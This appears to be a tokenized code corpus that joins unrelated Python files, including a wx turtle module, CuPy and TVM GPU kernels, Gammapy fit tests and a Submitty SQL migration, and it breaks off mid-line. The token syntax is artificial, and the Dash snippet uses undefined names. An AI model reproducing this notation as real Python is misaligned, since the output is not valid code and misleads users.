<import_stmt>wx<import_from_stmt>.misc.helpers deg_to_rad rad_to_deg<import_from_stmt>.misc.vector Vector<line_sep># Size of the turtle canvas. We assume no user will have a screen # so big that the canvas will be bigger than this. BITMAP_SIZE=Vector((2000 1200))<line_sep># Center of the canvas. origin=BITMAP_SIZE/2.0<def_stmt>to_my_angle angle<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>rad_to_deg(-angle)-180<block_end><def_stmt>from_my_angle angle<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>deg_to_rad(-angle+180)<block_end><def_stmt>from_my_pos pos<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>-pos+origin<block_end><def_stmt>to_my_pos pos<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>-pos+origin<block_end><class_stmt>Turtle<block_start>""" A Turtle object defines a turtle by its attributes, such as position, orientation, color, etc. See source of __init__ for a complete list. """<def_stmt>__init__ self<block_start>self.pos=Vector((0 0))<line_sep>self.orientation=180<line_sep>self.color="red"<line_sep>self.width=3<line_sep>self.visible=<true><line_sep>self.pen_down=<true><line_sep># the `clear` attribute is only made True momentarily when # the `clear()` function is called by the user to clear the screen. self.clear=<false><line_sep>self.SPEED=400.0# Pixels per second self.ANGULAR_SPEED=360.0<block_end># Degrees per second <def_stmt>give_pen self<block_start>""" Gives a wxPython pen that corresponds to the color, width, and pen_downity of the Turtle instance. """<line_sep><return>wx.Pen(self.color self.width wx.SOLID<if>self.pen_down<else>wx.TRANSPARENT)<block_end><block_end>
# -*- coding: utf-8 -*- # Use this file to easily define all of your cron jobs. # # It's helpful to understand cron before proceeding. # http://en.wikipedia.org/wiki/Cron # # Learn more: http://github.com/fengsp/plan <import_from_stmt>plan Plan<line_sep>cron=Plan("scripts" path='/web/yourproject/scripts' environment={'YOURAPP_ENV':'production'})<line_sep>cron.script('script.py' every='1.day')<line_sep>cron.script('script_2.py' every='1.month' at='hour.12 minute.0')<line_sep># more scripts here <if_stmt>__name__<eq>"__main__"<block_start>cron.run('update')<block_end>
<import_stmt>cupy<import_from_stmt>cupyx jit<line_sep>@jit.rawkernel()<def_stmt>reduction x y size<block_start>tid=jit.threadIdx.x<line_sep>ntid=jit.blockDim.x<line_sep>value=cupy.float32(0)<for_stmt>i range(tid size ntid)<block_start>value<augadd>x[i]<block_end>smem=jit.shared_memory(cupy.float32 1024)<line_sep>smem[tid]=value<line_sep>jit.syncthreads()<if_stmt>tid<eq>cupy.uint32(0)<block_start>value=cupy.float32(0)<for_stmt>i range(ntid)<block_start>value<augadd>smem[i]<block_end>y[0]=value<block_end><block_end>size=cupy.uint32(2<power>22)<line_sep>x=cupy.random.normal(size=(size ) dtype=cupy.float32)<line_sep>y=cupy.empty((1 ) dtype=cupy.float32)<line_sep>reduction[1 1024](x y size)<line_sep>print(y[0])<line_sep>print(x.sum())<line_sep>
<import_stmt>dash<import_stmt>dash_html_components<as>html<import_stmt>os<import_stmt>config<line_sep>STATIC_PREFIX='/{}/static/'.format(config.DASH_APP_NAME)<line_sep>app=dash.Dash()<line_sep>app.layout=html.Div([html.Img(src='{}my-image.png'.format(STATIC_PREFIX))])<line_sep># Static routes for on-premise are a little bit different than local # because the Plotly On-Premise proxy server strips away the app name # before forwarding the request to Dash <if_stmt>'DYNO'<in>os.environ<block_start>static_route='/static/<path:path>'<block_end><else_stmt><block_start>static_route='/{}/static/<path:path>'.format(config.DASH_APP_NAME)<block_end>@server.route(static_route)<def_stmt>serve_static path<block_start>root_dir=os.getcwd()<line_sep><return>flask.send_from_directory(os.path.join(root_dir 'static') path)<block_end>
# encoding: utf-8 # author: BrikerMan # contact: <EMAIL> # blog: https://eliyar.biz # file: abc_embedding.py # time: 2:43 下午 <import_stmt>json<import_from_stmt>typing Dict List Any Optional Union<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_stmt>tqdm<import_stmt>kashgari<import_from_stmt>kashgari.generators CorpusGenerator<import_from_stmt>kashgari.logger logger<import_from_stmt>kashgari.processors ABCProcessor<line_sep>L=tf.keras.layers<class_stmt>ABCEmbedding<block_start><def_stmt>to_dict self<arrow>Dict[str Any]<block_start>config:Dict[str Any]={'segment':self.segment 'embedding_size':self.embedding_size 'max_position':self.max_position **self.kwargs}<line_sep><return>{'__class_name__':self.__class__.__name__ '__module__':self.__class__.__module__ 'config':config 'embed_model':json.loads(self.embed_model.to_json())}<block_end><def_stmt>__init__ self segment:bool=<false> embedding_size:int=100 max_position:int=<none> **kwargs:Any<block_start>self.embed_model:tf.keras.Model=<none><line_sep>self.segment:bool=segment# type: ignore self.kwargs=kwargs<line_sep>self.embedding_size:int=embedding_size# type: ignore self.max_position:int=max_position# type: ignore self.vocab2idx=self.load_embed_vocab()<line_sep>self._text_processor:Optional[ABCProcessor]=<none><block_end><def_stmt>_override_load_model self config:Dict<arrow><none><block_start>embed_model_json_str=json.dumps(config['embed_model'])<line_sep>self.embed_model=tf.keras.models.model_from_json(embed_model_json_str custom_objects=kashgari.custom_objects)<block_end><def_stmt>setup_text_processor self processor:ABCProcessor<arrow><none><block_start>self._text_processor=processor<line_sep>self.build_embedding_model(vocab_size=processor.vocab_size)<line_sep>self._text_processor.segment=self.segment<if_stmt>self.vocab2idx<block_start>self._text_processor.vocab2idx=self.vocab2idx<line_sep>self._text_processor.idx2vocab=dict([(v k)<for>k,v self.vocab2idx.items()])<block_end><block_end><def_stmt>get_seq_length_from_corpus self generators:List[CorpusGenerator] * use_label:bool=<false> cover_rate:float=0.95<arrow>int<block_start>""" Calculate proper sequence length according to the corpus Args: generators: use_label: cover_rate: Returns: """<line_sep>seq_lens=[]<for_stmt>gen generators<block_start><for_stmt>sentence,label tqdm.tqdm(gen desc="Calculating sequence length")<block_start><if_stmt>use_label<block_start>seq_lens.append(len(label))<block_end><else_stmt><block_start>seq_lens.append(len(sentence))<block_end><block_end><block_end><if_stmt>cover_rate<eq>1.0<block_start>target_index=-1<block_end><else_stmt><block_start>target_index=int(cover_rate<times>len(seq_lens))<block_end>sequence_length=sorted(seq_lens)[target_index]<line_sep>logger.debug(f'Calculated sequence length = {sequence_length}')<line_sep><return>sequence_length<block_end><def_stmt>load_embed_vocab self<arrow>Optional[Dict[str int]]<block_start>""" Load vocab dict from embedding layer Returns: vocab dict or None """<line_sep><raise>NotImplementedError<block_end><def_stmt>build_embedding_model self * vocab_size:int=<none> force:bool=<false> **kwargs:Dict<arrow><none><block_start><raise>NotImplementedError<block_end><def_stmt>embed self sentences:List[List[str]] * debug:bool=<false><arrow>np.ndarray<block_start>""" batch embed sentences Args: sentences: Sentence list to embed debug: show debug info Returns: vectorized sentence list """<if_stmt>self._text_processor<is><none><block_start><raise>ValueError('Need to setup the `embedding.setup_text_processor` before calling the embed function.')<block_end>tensor_x=self._text_processor.transform(sentences segment=self.segment seq_length=self.max_position)<if_stmt>debug<block_start>logger.debug(f'sentence tensor: {tensor_x}')<block_end>embed_results=self.embed_model.predict(tensor_x)<line_sep><return>embed_results<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start><pass><block_end>
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Functions for querying registered kernels."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>tensorflow.core.framework kernel_def_pb2<import_from_stmt>tensorflow.python pywrap_tensorflow<as>c_api<import_from_stmt>tensorflow.python.util compat<def_stmt>get_all_registered_kernels <block_start>"""Returns a KernelList proto of all registered kernels. """<line_sep>buf=c_api.TF_GetAllRegisteredKernels()<line_sep>data=c_api.TF_GetBuffer(buf)<line_sep>kernel_list=kernel_def_pb2.KernelList()<line_sep>kernel_list.ParseFromString(compat.as_bytes(data))<line_sep><return>kernel_list<block_end><def_stmt>get_registered_kernels_for_op name<block_start>"""Returns a KernelList proto of registered kernels for a given op. Args: name: A string representing the name of the op whose kernels to retrieve. """<line_sep>buf=c_api.TF_GetRegisteredKernelsForOp(name)<line_sep>data=c_api.TF_GetBuffer(buf)<line_sep>kernel_list=kernel_def_pb2.KernelList()<line_sep>kernel_list.ParseFromString(compat.as_bytes(data))<line_sep><return>kernel_list<block_end>
# Licensed under a 3-clause BSD style license - see LICENSE.rst """Unit tests for the Fit class"""<import_stmt>pytest<import_from_stmt>numpy.testing assert_allclose<import_from_stmt>astropy.table Table<import_from_stmt>gammapy.datasets Dataset<import_from_stmt>gammapy.modeling Fit Parameter<import_from_stmt>gammapy.modeling.models Model Models<import_from_stmt>gammapy.utils.testing requires_dependency<line_sep>pytest.importorskip("iminuit")<class_stmt>MyModel(Model)<block_start>x=Parameter("x" 2)<line_sep>y=Parameter("y" 3e2)<line_sep>z=Parameter("z" 4e-2)<line_sep>name="test"<line_sep>datasets_names=["test"]<line_sep>type="model"<block_end><class_stmt>MyDataset(Dataset)<block_start>tag="MyDataset"<def_stmt>__init__ self name="test"<block_start>self._name=name<line_sep>self._models=Models([MyModel(x=1.99 y=2.99e3 z=3.99e-2)])<line_sep>self.data_shape=(1 )<line_sep>self.meta_table=Table()<block_end>@property<def_stmt>models self<block_start><return>self._models<block_end><def_stmt>stat_sum self# self._model.parameters = parameters <block_start>x,y,z=[p.value<for>p self.models.parameters]<line_sep>x_opt,y_opt,z_opt=2 3e2 4e-2<line_sep><return>(x-x_opt)<power>2+(y-y_opt)<power>2+(z-z_opt)<power>2<block_end><def_stmt>fcn self<block_start>x,y,z=[p.value<for>p self.models.parameters]<line_sep>x_opt,y_opt,z_opt=2 3e5 4e-5<line_sep>x_err,y_err,z_err=0.2 3e4 4e-6<line_sep><return>(((x-x_opt)/x_err)<power>2+((y-y_opt)/y_err)<power>2+((z-z_opt)/z_err)<power>2)<block_end><def_stmt>stat_array self<block_start>"""Statistic array, one value per data point."""<block_end><block_end>@requires_dependency("iminuit")@requires_dependency("sherpa")@pytest.mark.parametrize("backend" ["sherpa" "scipy"])<def_stmt>test_optimize_backend_and_covariance backend<block_start>dataset=MyDataset()<if_stmt>backend<eq>"scipy"<block_start>kwargs={"method":"L-BFGS-B"}<block_end><else_stmt><block_start>kwargs={}<block_end>kwargs["backend"]=backend<line_sep>fit=Fit(optimize_opts=kwargs)<line_sep>result=fit.run([dataset])<line_sep>result=result["optimize_result"]<line_sep>pars=result.parameters<line_sep>assert_allclose(pars["x"].value 2 rtol=1e-3)<line_sep>assert_allclose(pars["y"].value 3e2 rtol=1e-3)<line_sep>assert_allclose(pars["z"].value 4e-2 rtol=1e-2)<line_sep>assert_allclose(pars["x"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["y"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["z"].error 1 rtol=1e-7)<line_sep>correlation=dataset.models.covariance.correlation<line_sep>assert_allclose(correlation[0 1] 0 atol=1e-7)<line_sep>assert_allclose(correlation[0 2] 0 atol=1e-7)<line_sep>assert_allclose(correlation[1 2] 0 atol=1e-7)<block_end>@pytest.mark.parametrize("backend" ["minuit"])<def_stmt>test_run backend<block_start>dataset=MyDataset()<line_sep>fit=Fit(backend=backend)<line_sep>result=fit.run([dataset])<line_sep>result=result["optimize_result"]<line_sep>pars=result.parameters<assert_stmt>result.success<is><true><line_sep>assert_allclose(pars["x"].value 2 rtol=1e-3)<line_sep>assert_allclose(pars["y"].value 3e2 rtol=1e-3)<line_sep>assert_allclose(pars["z"].value 4e-2 rtol=1e-3)<line_sep>assert_allclose(pars["x"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["y"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["z"].error 1 rtol=1e-7)<line_sep>correlation=dataset.models.covariance.correlation<line_sep>assert_allclose(correlation[0 1] 0 atol=1e-7)<line_sep>assert_allclose(correlation[0 2] 0 atol=1e-7)<line_sep>assert_allclose(correlation[1 2] 0 atol=1e-7)<block_end>@requires_dependency("sherpa")@pytest.mark.parametrize("backend" ["minuit" "sherpa" "scipy"])<def_stmt>test_optimize backend<block_start>dataset=MyDataset()<if_stmt>backend<eq>"scipy"<block_start>kwargs={"method":"L-BFGS-B"}<block_end><else_stmt><block_start>kwargs={}<block_end>fit=Fit(store_trace=<true> backend=backend optimize_opts=kwargs)<line_sep>result=fit.optimize([dataset])<line_sep>pars=dataset.models.parameters<assert_stmt>result.success<is><true><line_sep>assert_allclose(result.total_stat 0 atol=1)<line_sep>assert_allclose(pars["x"].value 2 rtol=1e-3)<line_sep>assert_allclose(pars["y"].value 3e2 rtol=1e-3)<line_sep>assert_allclose(pars["z"].value 4e-2 rtol=1e-2)<assert_stmt>len(result.trace)<eq>result.nfev<block_end># TODO: add some extra covariance tests, in addition to run # Probably mainly if error message is OK if optimize didn't run first. # def test_covariance(): @pytest.mark.parametrize("backend" ["minuit"])<def_stmt>test_confidence backend<block_start>dataset=MyDataset()<line_sep>fit=Fit(backend=backend)<line_sep>fit.optimize([dataset])<line_sep>result=fit.confidence(datasets=[dataset] parameter="x")<assert_stmt>result["success"]<is><true><line_sep>assert_allclose(result["errp"] 1)<line_sep>assert_allclose(result["errn"] 1)<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["x"].value 2)<block_end>@pytest.mark.parametrize("backend" ["minuit"])<def_stmt>test_confidence_frozen backend<block_start>dataset=MyDataset()<line_sep>dataset.models.parameters["x"].frozen=<true><line_sep>fit=Fit(backend=backend)<line_sep>fit.optimize([dataset])<line_sep>result=fit.confidence(datasets=[dataset] parameter="y")<assert_stmt>result["success"]<is><true><line_sep>assert_allclose(result["errp"] 1)<line_sep>assert_allclose(result["errn"] 1)<block_end><def_stmt>test_stat_profile <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>dataset.models.parameters["x"].scan_n_values=3<line_sep>result=fit.stat_profile(datasets=[dataset] parameter="x")<line_sep>assert_allclose(result["x_scan"] [0 2 4] atol=1e-7)<line_sep>assert_allclose(result["stat_scan"] [4 0 4] atol=1e-7)<assert_stmt>len(result["fit_results"])<eq>0<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["x"].value 2)<block_end><def_stmt>test_stat_profile_reoptimize <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>dataset.models.parameters["y"].value=0<line_sep>dataset.models.parameters["x"].scan_n_values=3<line_sep>result=fit.stat_profile(datasets=[dataset] parameter="x" reoptimize=<true>)<line_sep>assert_allclose(result["x_scan"] [0 2 4] atol=1e-7)<line_sep>assert_allclose(result["stat_scan"] [4 0 4] atol=1e-7)<line_sep>assert_allclose(result["fit_results"][0].total_stat result["stat_scan"][0] atol=1e-7)<block_end><def_stmt>test_stat_surface <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>x_values=[1 2 3]<line_sep>y_values=[2e2 3e2 4e2]<line_sep>dataset.models.parameters["x"].scan_values=x_values<line_sep>dataset.models.parameters["y"].scan_values=y_values<line_sep>result=fit.stat_surface(datasets=[dataset] x="x" y="y")<line_sep>assert_allclose(result["x_scan"] x_values atol=1e-7)<line_sep>assert_allclose(result["y_scan"] y_values atol=1e-7)<line_sep>expected_stat=[[1.0001e04 1.0000e00 1.0001e04] [1.0000e04 0.0000e00 1.0000e04] [1.0001e04 1.0000e00 1.0001e04] ]<line_sep>assert_allclose(list(result["stat_scan"]) expected_stat atol=1e-7)<assert_stmt>len(result["fit_results"])<eq>0<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["x"].value 2)<line_sep>assert_allclose(dataset.models.parameters["y"].value 3e2)<block_end><def_stmt>test_stat_surface_reoptimize <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>x_values=[1 2 3]<line_sep>y_values=[2e2 3e2 4e2]<line_sep>dataset.models.parameters["z"].value=0<line_sep>dataset.models.parameters["x"].scan_values=x_values<line_sep>dataset.models.parameters["y"].scan_values=y_values<line_sep>result=fit.stat_surface(datasets=[dataset] x="x" y="y" reoptimize=<true>)<line_sep>assert_allclose(result["x_scan"] x_values atol=1e-7)<line_sep>assert_allclose(result["y_scan"] y_values atol=1e-7)<line_sep>expected_stat=[[1.0001e04 1.0000e00 1.0001e04] [1.0000e04 0.0000e00 1.0000e04] [1.0001e04 1.0000e00 1.0001e04] ]<line_sep>assert_allclose(list(result["stat_scan"]) expected_stat atol=1e-7)<line_sep>assert_allclose(result["fit_results"][0][0].total_stat result["stat_scan"][0][0] atol=1e-7)<block_end><def_stmt>test_stat_contour <block_start>dataset=MyDataset()<line_sep>dataset.models.parameters["x"].frozen=<true><line_sep>fit=Fit(backend="minuit")<line_sep>fit.optimize([dataset])<line_sep>result=fit.stat_contour(datasets=[dataset] x="y" y="z")<assert_stmt>result["success"]<is><true><line_sep>x=result["y"]<line_sep>assert_allclose(len(x) 10)<line_sep>assert_allclose(x[0] 299 rtol=1e-5)<line_sep>assert_allclose(x[-1] 299.292893 rtol=1e-5)<line_sep>y=result["z"]<line_sep>assert_allclose(len(y) 10)<line_sep>assert_allclose(y[0] 0.04 rtol=1e-5)<line_sep>assert_allclose(y[-1] 0.747107 rtol=1e-5)<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["y"].value 300)<block_end>
# Java locale differences from JDK 9 onwards, and locale variation on # developer machines, break test_strptime tests. This manifests more on Windows. # Rather than diverge from the Python source, this overrides with extra locale # setup. # Merging back into CPython is desirable, but is a bigger discussion around # library merging generally. <import_stmt>unittest<import_from_stmt>datetime datetime<import_from_stmt>time strptime<import_from_stmt>test.test_strptime *<import_from_stmt>test test_support<class_stmt>ParsingTests(unittest.TestCase)<block_start><def_stmt>test_iso8601 self<block_start>now=datetime.utcnow().replace(microsecond=0)<line_sep>self.assertEqual(now datetime.strptime(now.isoformat('T') "%Y-%m-%dT%H:%M:%S"))<line_sep># tests bug 1662 self.assertEqual(now datetime.strptime(now.isoformat('T')+'Z' "%Y-%m-%dT%H:%M:%SZ"))<block_end><def_stmt>test_IllegalArgument_to_ValueError self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>d=strptime('' '%e')<block_end><block_end><def_stmt>test_issue1964 self<block_start>d=strptime('0' '%f')<line_sep>self.assertEqual(1900 d.tm_year)<block_end><def_stmt>test_issue2112 self<block_start>d=strptime('1' '%d')<line_sep>self.assertEqual(1900 d.tm_year)<block_end><block_end><def_stmt>test_main initialize=<true><block_start>test_support.force_reset_locale(initialize)<line_sep>test_support.run_unittest(getlang_Tests LocaleTime_Tests TimeRETests StrptimeTests Strptime12AMPMTests JulianTests CalculationTests CacheTests ParsingTests)<block_end><if_stmt>__name__<eq>'__main__'<block_start>test_main(initialize=<false>)<block_end>
''' @author: <NAME> Filling one cell: O(1) Filling all cells: O(2xn) = O(n) '''<def_stmt>find_maximum_cost Y<block_start>values=[[0<for>_ range(2)]<for>_ range(len(Y))]<line_sep># Go on with adding these 2 options i=1<while_stmt>i<l>len(Y)# Put these two options <block_start>values[i][0]=max(values[i-1][0] values[i-1][1]+Y[i-1]-1)<line_sep>values[i][1]=max(values[i-1][1]+abs(Y[i]-Y[i-1]) values[i-1][0]+Y[i]-1)<line_sep>i<augadd>1<line_sep>#print(values) <block_end><return>max(values[len(Y)-1][0] values[len(Y)-1][1])<block_end><def_stmt>main <block_start>Y=[5 6 8 13 9]<line_sep>cost=find_maximum_cost(Y)<line_sep>print(cost)<line_sep># Output: 34 <block_end>main()<line_sep>
"""Migration for a given Submitty course database."""<def_stmt>up config database semester course<block_start>""" Run up migration. :param config: Object holding configuration details about Submitty :type config: migrator.config.Config :param database: Object for interacting with given database for environment :type database: migrator.db.Database :param semester: Semester of the course being migrated :type semester: str :param course: Code of course being migrated :type course: str """<line_sep># Create overall comment table database.execute(""" CREATE TABLE IF NOT EXISTS gradeable_data_overall_comment ( goc_id integer NOT NULL, g_id character varying(255) NOT NULL, goc_user_id character varying(255), goc_team_id character varying(255), goc_grader_id character varying(255) NOT NULL, goc_overall_comment character varying NOT NULL, CONSTRAINT goc_user_team_id_check CHECK (goc_user_id IS NOT NULL OR goc_team_id IS NOT NULL) ); """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_pkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_pkey PRIMARY KEY (goc_id); """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_g_id_fkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_g_id_fkey FOREIGN KEY (g_id) REFERENCES gradeable(g_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_user_id_fkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_goc_user_id_fkey FOREIGN KEY (goc_user_id) REFERENCES users(user_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_team_id_fkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_goc_team_id_fkey FOREIGN KEY (goc_team_id) REFERENCES gradeable_teams(team_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_grader_id")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_goc_grader_id FOREIGN KEY (goc_grader_id) REFERENCES users(user_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_user_unique")<line_sep>database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_user_unique UNIQUE (g_id, goc_user_id, goc_grader_id);")<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_team_unique")<line_sep>database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_team_unique UNIQUE (g_id, goc_team_id, goc_grader_id);")<line_sep>database.execute(""" CREATE SEQUENCE IF NOT EXISTS gradeable_data_overall_comment_goc_id_seq START WITH 1 INCREMENT BY 1 NO MINVALUE NO MAXVALUE CACHE 1; """)<line_sep>database.execute("ALTER SEQUENCE gradeable_data_overall_comment_goc_id_seq OWNED BY gradeable_data_overall_comment.goc_id;")<line_sep>database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ALTER COLUMN goc_id SET DEFAULT nextval('gradeable_data_overall_comment_goc_id_seq'::regclass);")<line_sep># All old overall comments belong to the instructor instructor_id=database.execute("SELECT user_id FROM users WHERE user_group = 1;").first()[0]<line_sep>rows=database.execute(""" SELECT g_id, gd_user_id, gd_team_id, gd_overall_comment FROM gradeable_data; """)<for_stmt>g_id,user_id,team_id,comment rows<block_start>query=''' INSERT INTO gradeable_data_overall_comment ( g_id, goc_user_id, goc_team_id, goc_grader_id, goc_overall_comment ) VALUES ( :g_id, :user_id, :team_id, :grader_id, :comment ) ON CONFLICT DO NOTHING; '''<line_sep>params={'g_id':g_id 'user_id':user_id 'team_id':team_id 'grader_id':instructor_id 'comment':comment}<line_sep>database.session.execute(query params)<block_end><block_end><def_stmt>down config database semester course<block_start>""" Run down migration (rollback). :param config: Object holding configuration details about Submitty :type config: migrator.config.Config :param database: Object for interacting with given database for environment :type database: migrator.db.Database :param semester: Semester of the course being migrated :type semester: str :param course: Code of course being migrated :type course: str """<line_sep><pass><block_end>
""" Test different schedule on conv2d_nchw Target NVIDIA GPU ==================================== **Author**: `<NAME>` """<import_stmt>tvm<import_stmt>json<import_from_stmt>flextensor.measure _evaluate<import_from_stmt>flextensor.nn conv2d_nchw<import_from_stmt>flextensor.configs.conv2d_config yolo_shapes_b8<import_from_stmt>flextensor.utils any_factor_split<class_stmt>Parameter(object)<block_start><def_stmt>__init__ self<block_start>self.b_factors=[2 4 1 1]<line_sep>self.k_factors=[8 4 8 2]<line_sep>self.p_factors=[7 1 2 1]<line_sep>self.q_factors=[1 1 14 1]<line_sep>self.rc_factors=[1 32 32]<line_sep>self.ry_factors=[1 1 1]<line_sep>self.rx_factors=[1 1 1]<block_end><def_stmt>__str__ self<block_start>ret=""<line_sep>ret<augadd>str(self.b_factors)+"\n"<line_sep>ret<augadd>str(self.k_factors)+"\n"<line_sep>ret<augadd>str(self.p_factors)+"\n"<line_sep>ret<augadd>str(self.q_factors)+"\n"<line_sep>ret<augadd>str(self.rc_factors)+"\n"<line_sep>ret<augadd>str(self.ry_factors)+"\n"<line_sep>ret<augadd>str(self.rx_factors)+"\n"<line_sep><return>ret<block_end><block_end><def_stmt>schedule_yolo_conv_cuda_1 s outputs inputs weight parameter# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># create cache write_cache=s.cache_write(outputs "local")<line_sep>read_share_weight=s.cache_read(weight "shared" [write_cache])<line_sep># read_local_weight = s.cache_read(read_share_weight, "local", [write_cache]) read_share_inputs=s.cache_read(padded "shared" [write_cache])<line_sep># read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache]) b_factors=parameter.b_factors<line_sep>k_factors=parameter.k_factors<line_sep>p_factors=parameter.p_factors<line_sep>q_factors=parameter.q_factors<line_sep>rc_factors=parameter.rc_factors<line_sep>ry_factors=parameter.ry_factors<line_sep>rx_factors=parameter.rx_factors<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep>by=tvm.te.thread_axis("blockIdx.y")<line_sep>bz=tvm.te.thread_axis("blockIdx.z")<line_sep>vx=tvm.te.thread_axis("vthread")<line_sep>vy=tvm.te.thread_axis("vthread")<line_sep>vz=tvm.te.thread_axis("vthread")<line_sep>tx=tvm.te.thread_axis("threadIdx.x")<line_sep>ty=tvm.te.thread_axis("threadIdx.y")<line_sep>tz=tvm.te.thread_axis("threadIdx.z")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>kernel_scope,b=s[outputs].split(b nparts=1)<line_sep>bo,bi=s[outputs].split(b nparts=b_factors[0])<line_sep>ko,ki=s[outputs].split(k nparts=k_factors[0])<line_sep>po,pi=s[outputs].split(p nparts=p_factors[0])<line_sep>qo,qi=s[outputs].split(q nparts=q_factors[0])<line_sep>vbo,bi=s[outputs].split(bi nparts=b_factors[1])<line_sep>vko,ki=s[outputs].split(ki nparts=k_factors[1])<line_sep>vpo,pi=s[outputs].split(pi nparts=p_factors[1])<line_sep>vqo,qi=s[outputs].split(qi nparts=q_factors[1])<line_sep>tbo,bi=s[outputs].split(bi nparts=b_factors[2])<line_sep>tko,ki=s[outputs].split(ki nparts=k_factors[2])<line_sep>tpo,pi=s[outputs].split(pi nparts=p_factors[2])<line_sep>tqo,qi=s[outputs].split(qi nparts=q_factors[2])<line_sep># reorder s[outputs].reorder(bo ko po qo vbo vko vpo vqo tbo tko tpo tqo bi ki pi qi)<line_sep># fuse bko=s[outputs].fuse(bo ko)<line_sep>vbko=s[outputs].fuse(vbo vko)<line_sep>tbko=s[outputs].fuse(tbo tko)<line_sep>bki=s[outputs].fuse(bi ki)<line_sep># bind s[outputs].bind(bko bz)<line_sep>s[outputs].bind(po by)<line_sep>s[outputs].bind(qo bx)<line_sep>s[outputs].bind(vbko vz)<line_sep>s[outputs].bind(vpo vy)<line_sep>s[outputs].bind(vqo vx)<line_sep>s[outputs].bind(tbko tz)<line_sep>s[outputs].bind(tpo ty)<line_sep>s[outputs].bind(tqo tx)<line_sep># compute at write cache s[write_cache].compute_at(s[outputs] tqo)<line_sep>rc,ry,rx=s[write_cache].op.reduce_axis<line_sep>rco,rci=s[write_cache].split(rc nparts=rc_factors[0])<line_sep>rcm,rci=s[write_cache].split(rci nparts=rc_factors[1])<line_sep>ryo,ryi=s[write_cache].split(ry nparts=ry_factors[0])<line_sep>rym,ryi=s[write_cache].split(ryi nparts=ry_factors[1])<line_sep>rxo,rxi=s[write_cache].split(rx nparts=rx_factors[0])<line_sep>rxm,rxi=s[write_cache].split(rxi nparts=rx_factors[1])<line_sep>a,b,c,d=s[write_cache].op.axis<line_sep>s[write_cache].reorder(rco ryo rxo rcm rym rxm rci ryi rxi a b c d)<line_sep># compute at read cache s[read_share_weight].compute_at(s[write_cache] rxm)<line_sep># s[read_local_weight].compute_at(s[write_cache], rxi) s[read_share_inputs].compute_at(s[write_cache] rxm)<line_sep># s[read_local_inputs].compute_at(s[write_cache], rxi) # cooperative fetching <for_stmt>cache [read_share_inputs read_share_weight]<block_start>cb,ck,ch,cw=s[cache].op.axis<line_sep>fused=s[cache].fuse(cb ck ch cw)<line_sep>fused,bindx=s[cache].split(fused factor=q_factors[2])<line_sep>fused,bindy=s[cache].split(fused factor=p_factors[2])<line_sep>fused,bindz=s[cache].split(fused factor=b_factors[2]<times>k_factors[2])<line_sep>s[cache].bind(bindx tx)<line_sep>s[cache].bind(bindy 